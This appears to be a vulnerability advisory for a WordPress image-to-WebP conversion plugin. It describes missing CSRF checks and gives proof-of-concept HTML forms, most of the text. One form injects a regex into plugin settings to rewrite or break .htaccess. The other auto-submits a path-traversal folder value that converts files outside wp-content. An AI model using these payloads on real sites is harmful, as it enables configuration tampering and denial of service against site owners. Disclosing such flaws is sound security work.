The plugin does not have CSRF checks in place when performing some administrative actions, which could result in modification of plugin settings, Denial-of-Service, as well as arbitrary image conversion
The PoC varies based on the endpoint targeted. Here is one example that will modify the website's .htaccess file when the form is submitted by a logged in user. <form action="https://example.com/wp-admin/upload.php?page=images-to-webp.php&tab=general" method="post" enctype="application/x-www-form-urlencoded" id="form"> <input type="hidden" name="plugin_sent" value="1"> <input type="hidden" name="webp_quality" value="50"> <input type="hidden" name="upload_convert" value="1"> <input type="hidden" name="method" value="gd"> <input type="hidden" name="extensions[]" value="jpg"> <!-- Inject regular expression. You can also add invalid regex to make malformed .htaccess file and DoS. --> <input type="hidden" name="extensions[]" value="INJECT_VALUE_HERE)|(.*"> <input type=submit> </form> This converts file on C:\xampp\htdocs\png_images if WordPress is installed on C:\xampp\htdocs\wordpress\, the path is relative to wp-content <form action="https://example.com/wp-admin/admin-ajax.php" method="post" enctype="application/x-www-form-urlencoded" id="form"> <input type="hidden" name="action" value="convert_old_images"> <input type="hidden" name="only_missing" value="0"> <input type="hidden" name="folder" value="../../png_images"> </form> <script>form.submit()</form>
apple502j
apple502j
Yes
2021-10-19 (about 1 years ago)
2021-10-19 (about 1 years ago)
2022-04-11 (about 1 years ago)